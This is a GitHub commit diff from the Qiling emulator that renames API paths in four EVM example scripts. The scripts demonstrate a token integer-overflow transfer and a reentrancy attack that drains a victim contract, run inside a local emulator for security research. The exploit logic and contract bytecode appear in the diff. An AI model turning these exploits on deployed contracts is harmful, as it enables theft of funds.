Skip to content

Commit dc31e89

Browse files
kabeorkabeor
authored
Merge pull request #893 from kabeor/dev
Dev
2 parents 7372194 + 1de2121 commit dc31e89

18 files changed

+134
-140
lines changed

examples/evm/evm_Hexagon_overflow.py

Lines changed: 10 additions & 12 deletions
Original file line numberDiff line numberDiff line change
@@ -3,37 +3,35 @@
33

44
import sys
55

6-
sys.path.append("../../../..")
6+
sys.path.append("../..")
77
from qiling import *
8-
from qiling.engine.evm.vm.utils import analysis_bytecode, bytecode_to_bytes
9-
from qiling.engine.evm.vm.disassembler import EVMDisasm
108

119

1210
def example_run_evm():
1311
ql = Qiling(archtype="evm")
1412
contract = '0x606060405266017dfcdece4000600055341561001a57600080fd5b600160a060020a033316600090815260016020526040902066017dfcdece400090556106eb8061004b6000396000f3006060604052600436106100c45763ffffffff7c010000000000000000000000000000000000000000000000000000000060003504166306fdde0381146100c9578063095ea7b31461015357806318160ddd1461018957806323b872dd146101ae57806327edf097146101d6578063313ce567146101ff578063378dc3dc1461021257806342966c681461022557806370a082311461023b578063771282f61461025a57806395d89b411461026d578063a9059cbb14610280578063dd62ed3e146102a2575b600080fd5b34156100d457600080fd5b6100dc6102c7565b60405160208082528190810183818151815260200191508051906020019080838360005b83811015610118578082015183820152602001610100565b50505050905090810190601f1680156101455780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b341561015e57600080fd5b610175600160a060020a03600435166024356102fe565b604051901515815260200160405180910390f35b341561019457600080fd5b61019c6103a4565b60405190815260200160405180910390f35b34156101b957600080fd5b610175600160a060020a03600435811690602435166044356103aa565b34156101e157600080fd5b6101e9610422565b60405160ff909116815260200160405180910390f35b341561020a57600080fd5b6101e9610427565b341561021d57600080fd5b61019c61042c565b341561023057600080fd5b610175600435610437565b341561024657600080fd5b61019c600160a060020a03600435166104ea565b341561026557600080fd5b61019c6104fc565b341561027857600080fd5b6100dc610502565b341561028b57600080fd5b610175600160a060020a0360043516602435610539565b34156102ad57600080fd5b61019c600160a060020a036004358116906024351661054f565b60408051908101604052600781527f48657861676f6e00000000000000000000000000000000000000000000000000602082015281565b60008115806103305750600160a060020a03338116600090815260026020908152604080832093871683529290522054155b151561033b57600080fd5b600160a060020a03338116600081815260026020908152604080832094881680845294909152908190208590557f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259085905190815260200160405180910390a350600192915050565b60005490565b600160a060020a03808416600090815260026020908152604080832033909416835292905290812054829010156103e057600080fd5b600160a060020a038085166000908152600260209081526040808320339094168352929052208054839003905561041884848461056c565b5060019392505050565b600281565b600481565b66017dfcdece400081565b600160a060020a0333166000908152600160205260408120548290101561045d57600080fd5b600160a060020a033316600081815260016020526040808220805486900390558180527fa6eef7e35abe7026729641147f7915573c7e97b47efa546f5f6e3230263bcb4980548601905581548590039091557fcc16f5dbb4873280815c1ee09dbd06736cffcc184412cf7a71a0fdb75d397ca59084905190815260200160405180910390a2506001919050565b60016020526000908152604090205481565b60005481565b60408051908101604052600381527f4858470000000000000000000000000000000000000000000000000000000000602082015281565b600061054633848461056c565b50600192915050565b600260209081526000928352604080842090915290825290205481565b600160a060020a038216151561058157600080fd5b600160a060020a038316600090815260016020526040902054600282019010156105aa57600080fd5b600160a060020a038216600090815260016020526040902054818101116105d057600080fd5b600160a060020a03808416600081815260016020526040808220805460011990879003810190915593861682528082208054860190558180527fa6eef7e35abe7026729641147f7915573c7e97b47efa546f5f6e3230263bcb4980546002908101909155825490940190915590917fcc16f5dbb4873280815c1ee09dbd06736cffcc184412cf7a71a0fdb75d397ca5915160ff909116815260200160405180910390a281600160a060020a031683600160a060020a03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405190815260200160405180910390a35050505600a165627a7a72305820fbef5b10322242b8659b5de8e24ec1cf5e809831f6f7c08e52112f76daa31aef0029'
1513

16-
user1 = ql.arch.evm.create_account(balance=100*10**18)
17-
user2 = ql.arch.evm.create_account(balance=100*10**18)
18-
c1 = ql.arch.evm.create_account()
14+
user1 = ql.arch.create_account(balance=100*10**18)
15+
user2 = ql.arch.create_account(balance=100*10**18)
16+
c1 = ql.arch.create_account()
1917

2018
def check_balance(sender, destination):
21-
call_data = '0x70a08231'+ql.arch.evm.abi.convert(['address'], [sender])
22-
msg2 = ql.arch.evm.create_message(sender, destination, data=call_data)
19+
call_data = '0x70a08231'+ql.arch.abi.convert(['address'], [sender])
20+
msg2 = ql.arch.create_message(sender, destination, data=call_data)
2321
return ql.run(code=msg2)
2422

2523
# Deploy runtime code
26-
msg0 = ql.arch.evm.create_message(user1, b'', code=contract, contract_address=c1)
24+
msg0 = ql.arch.create_message(user1, b'', code=contract, contract_address=c1)
2725
ql.run(code=msg0)
2826

2927
# # SMART CONTRACT DEPENDENT: check balance of user1
3028
result = check_balance(user1, c1)
3129
print('User1 balance =', int(result.output.hex()[2:], 16))
3230

3331
# # SMART CONTRACT DEPENDENT: transform from user1 to user2
34-
call_data = '0xa9059cbb'+ ql.arch.evm.abi.convert(['address'], [user2]) + \
35-
ql.arch.evm.abi.convert(['uint256'], [0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe])
36-
msg1 = ql.arch.evm.create_message(user1, c1, data=call_data)
32+
call_data = '0xa9059cbb'+ ql.arch.abi.convert(['address'], [user2]) + \
33+
ql.arch.abi.convert(['uint256'], [0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe])
34+
msg1 = ql.arch.create_message(user1, c1, data=call_data)
3735
result = ql.run(code=msg1)
3836
if int(result.output.hex()[2:], 16) == 1:
3937
print('User1 transfered Token to User1')

examples/evm/evm_debugger.py

Lines changed: 6 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,5 @@
11
import sys
2-
sys.path.append("../../../..")
2+
sys.path.append("../..")
33
from qiling import *
44

55

@@ -9,12 +9,12 @@
99
contract = '0x6060604052341561000f57600080fd5b60405160208061031c833981016040528080519060200190919050508060018190556000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555050610299806100836000396000f300606060405260043610610057576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff16806318160ddd1461005c57806370a0823114610085578063a9059cbb146100d2575b600080fd5b341561006757600080fd5b61006f61012c565b6040518082815260200191505060405180910390f35b341561009057600080fd5b6100bc600480803573ffffffffffffffffffffffffffffffffffffffff16906020019091905050610132565b6040518082815260200191505060405180910390f35b34156100dd57600080fd5b610112600480803573ffffffffffffffffffffffffffffffffffffffff1690602001909190803590602001909190505061017a565b604051808215151515815260200191505060405180910390f35b60015481565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b600080826000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205403101515156101cb57600080fd5b816000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540392505081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254019250508190555060019050929150505600a165627a7a7230582098f1551a391a3e65b3ce45cfa2b3fa5f91eea9a3e7181a81454e025ea0d7151c0029'
1010

1111
# Add Balance Var to the contract
12-
bal = ql.arch.evm.abi.convert(['uint256'], [20])
12+
bal = ql.arch.abi.convert(['uint256'], [20])
1313
contract = contract + bal
1414

15-
user1 = ql.arch.evm.create_account(balance=100*10**18)
16-
user2 = ql.arch.evm.create_account(balance=100*10**18)
17-
c1 = ql.arch.evm.create_account()
15+
user1 = ql.arch.create_account(balance=100*10**18)
16+
user2 = ql.arch.create_account(balance=100*10**18)
17+
c1 = ql.arch.create_account()
1818

19-
msg0 = ql.arch.evm.create_message(user1, b'', code=contract, contract_address=c1)
19+
msg0 = ql.arch.create_message(user1, b'', code=contract, contract_address=c1)
2020
ql.run(code=msg0)

examples/evm/evm_reentrancy.py

Lines changed: 11 additions & 11 deletions
Original file line numberDiff line numberDiff line change
@@ -1,25 +1,25 @@
11
import sys
22

3-
sys.path.append("../../../..")
3+
sys.path.append("../..")
44
from qiling import *
5-
from qiling.engine.evm.vm.utils import bytecode_to_bytes, runtime_code_detector
6-
from qiling.engine.evm.vm.vm import BaseVM
7-
from qiling.engine.evm.constants import CREATE_CONTRACT_ADDRESS
5+
from qiling.arch.evm.vm.utils import bytecode_to_bytes, runtime_code_detector
6+
from qiling.arch.evm.vm.vm import BaseVM
7+
from qiling.arch.evm.constants import CREATE_CONTRACT_ADDRESS
88

99

1010
if __name__ == '__main__':
1111
ql = Qiling(archtype="evm")
12-
vm:BaseVM = ql.arch.evm.emu.vm
12+
vm:BaseVM = ql.arch.emu.vm
1313

1414
C1 = b'\xaa' * 20
1515
C2 = b'\xbb' * 20
1616
User1 = b'\xcc' * 20
1717
User2 = b'\xde\xad\xbe\xef' * 5
1818

19-
ql.arch.evm.create_account(C1)
20-
ql.arch.evm.create_account(C2)
21-
ql.arch.evm.create_account(User1, 100*10**18)
22-
ql.arch.evm.create_account(User2, 100*10**18)
19+
ql.arch.create_account(C1)
20+
ql.arch.create_account(C2)
21+
ql.arch.create_account(User1, 100*10**18)
22+
ql.arch.create_account(User2, 100*10**18)
2323

2424
EtherStore_contract = '0x6080604052670de0b6b3a764000060005534801561001c57600080fd5b506103b08061002c6000396000f30060806040526004361061006d576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680631031ec3114610072578063155dd5ee146100c957806327e235e3146100f65780637ddfe78d1461014d578063e2c41dbc14610178575b600080fd5b34801561007e57600080fd5b506100b3600480360381019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610182565b6040518082815260200191505060405180910390f35b3480156100d557600080fd5b506100f46004803603810190808035906020019092919050505061019a565b005b34801561010257600080fd5b50610137600480360381019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610317565b6040518082815260200191505060405180910390f35b34801561015957600080fd5b5061016261032f565b6040518082815260200191505060405180910390f35b610180610335565b005b60016020528060005260406000206000915090505481565b80600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054101515156101e857600080fd5b60005481111515156101f957600080fd5b62093a80600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205401421015151561024c57600080fd5b3373ffffffffffffffffffffffffffffffffffffffff168160405160006040518083038185875af192505050151561028357600080fd5b80600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254039250508190555042600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555050565b60026020528060005260406000206000915090505481565b60005481565b34600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505600a165627a7a72305820707bf0ae11ce52ff7b7846ede3497d41b6fadea29579773fc70e8e61c0f549f10029'
2525
# Attack_contract = '0x608060405234801561001057600080fd5b5060405160208061046d83398101806040528101908080519060200190929190505050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550506103ea806100836000396000f300608060405260043610610057576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680636289d38514610152578063acd2e6e51461015c578063ff11e1db146101b3575b670de0b6b3a76400006000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16311115610150576000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663155dd5ee670de0b6b3a76400006040518263ffffffff167c010000000000000000000000000000000000000000000000000000000002815260040180828152602001915050600060405180830381600087803b15801561013757600080fd5b505af115801561014b573d6000803e3d6000fd5b505050505b005b61015a6101ca565b005b34801561016857600080fd5b50610171610339565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b3480156101bf57600080fd5b506101c861035e565b005b670de0b6b3a764000034101515156101e157600080fd5b6000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663e2c41dbc670de0b6b3a76400006040518263ffffffff167c01000000000000000000000000000000000000000000000000000000000281526004016000604051808303818588803b15801561026e57600080fd5b505af1158015610282573d6000803e3d6000fd5b50505050506000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663155dd5ee670de0b6b3a76400006040518263ffffffff167c010000000000000000000000000000000000000000000000000000000002815260040180828152602001915050600060405180830381600087803b15801561031f57600080fd5b505af1158015610333573d6000803e3d6000fd5b50505050565b6000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b3373ffffffffffffffffffffffffffffffffffffffff166108fc3073ffffffffffffffffffffffffffffffffffffffff16319081150290604051600060405180830381858888f193505050501580156103bb573d6000803e3d6000fd5b505600a165627a7a723058204ad3139b1085c12112b76e9eab70c6589942d6e84eb3d8329a644eca757c19d00029'
@@ -47,7 +47,7 @@
4747
# print(res.output)
4848
print('Victim balance: ', vm.state.get_balance(User1)/10**18)
4949

50-
code2 = bytecode_to_bytes(Attack_contract+ql.arch.evm.abi.convert(['address'], [C1]))
50+
code2 = bytecode_to_bytes(Attack_contract+ql.arch.abi.convert(['address'], [C1]))
5151
# print(code2.hex())
5252
print('\n------ Deploy Attack Contract')
5353

@@ -63,7 +63,7 @@
6363

6464
print('\n------ Attacker deposit 1 ETH to DeFi contract, Start Reentrancy Attack')
6565
# 4. User2 pwnEtherStore with 1ETH
66-
call_data = '0xa75e4625' + ql.arch.evm.abi.convert(['bytes4'], [bytecode_to_bytes('0xe2c41dbc')]) + ql.arch.evm.abi.convert(['bytes4'], [bytecode_to_bytes('0x155dd5ee')])
66+
call_data = '0xa75e4625' + ql.arch.abi.convert(['bytes4'], [bytecode_to_bytes('0xe2c41dbc')]) + ql.arch.abi.convert(['bytes4'], [bytecode_to_bytes('0x155dd5ee')])
6767
# ql.debugger = True
6868
msg4 = vm.build_message(None, 1, 3000000, C2, User2, 1*10**18, bytecode_to_bytes(call_data), rt_code1)
6969
res = vm.execute_message(msg4)

examples/evm/evm_reentrancy_vol.py

Lines changed: 11 additions & 11 deletions
Original file line numberDiff line numberDiff line change
@@ -1,25 +1,25 @@
11
import sys
22

3-
sys.path.append("../../../..")
3+
sys.path.append("../..")
44
from qiling import *
5-
from qiling.engine.evm.vm.utils import bytecode_to_bytes, runtime_code_detector
6-
from qiling.engine.evm.vm.vm import BaseVM
7-
from qiling.engine.evm.constants import CREATE_CONTRACT_ADDRESS
5+
from qiling.arch.evm.vm.utils import bytecode_to_bytes, runtime_code_detector
6+
from qiling.arch.evm.vm.vm import BaseVM
7+
from qiling.arch.evm.constants import CREATE_CONTRACT_ADDRESS
88

99

1010
def template(vic_contract, deposit, withdraw):
1111
ql = Qiling(archtype="evm")
12-
vm:BaseVM = ql.arch.evm.emu.vm
12+
vm:BaseVM = ql.arch.emu.vm
1313

1414
C1 = b'\xaa' * 20
1515
C2 = b'\xbb' * 20
1616
User1 = b'\xcc' * 20
1717
User2 = b'\xde\xad\xbe\xef' * 5
1818

19-
ql.arch.evm.create_account(C1)
20-
ql.arch.evm.create_account(C2)
21-
ql.arch.evm.create_account(User1, 100*10**18)
22-
ql.arch.evm.create_account(User2, 100*10**18)
19+
ql.arch.create_account(C1)
20+
ql.arch.create_account(C2)
21+
ql.arch.create_account(User1, 100*10**18)
22+
ql.arch.create_account(User2, 100*10**18)
2323

2424
EtherStore_contract = vic_contract
2525

@@ -47,7 +47,7 @@ def template(vic_contract, deposit, withdraw):
4747
# print(res.output)
4848
print('Victim balance: ', vm.state.get_balance(User1)/10**18)
4949

50-
code2 = bytecode_to_bytes(Attack_contract+ql.arch.evm.abi.convert(['address'], [C1]))
50+
code2 = bytecode_to_bytes(Attack_contract+ql.arch.abi.convert(['address'], [C1]))
5151
# print(code2.hex())
5252
print('\n------ Deploy Attack Contract')
5353

@@ -63,7 +63,7 @@ def template(vic_contract, deposit, withdraw):
6363

6464
print('\n------ Attacker deposit 1 ETH to DeFi contract, Start Reentrancy Attack')
6565
# 4. User2 pwnEtherStore with 1ETH
66-
call_data = '0xa75e4625' + ql.arch.evm.abi.convert(['bytes4'], [bytecode_to_bytes(deposit)]) + ql.arch.evm.abi.convert(['bytes4'], [bytecode_to_bytes(withdraw)])
66+
call_data = '0xa75e4625' + ql.arch.abi.convert(['bytes4'], [bytecode_to_bytes(deposit)]) + ql.arch.abi.convert(['bytes4'], [bytecode_to_bytes(withdraw)])
6767

6868
msg4 = vm.build_message(None, 1, 3000000, C2, User2, 1*10**18, bytecode_to_bytes(call_data), rt_code1)
6969
res = vm.execute_message(msg4)

0 commit comments

Comments
 (0)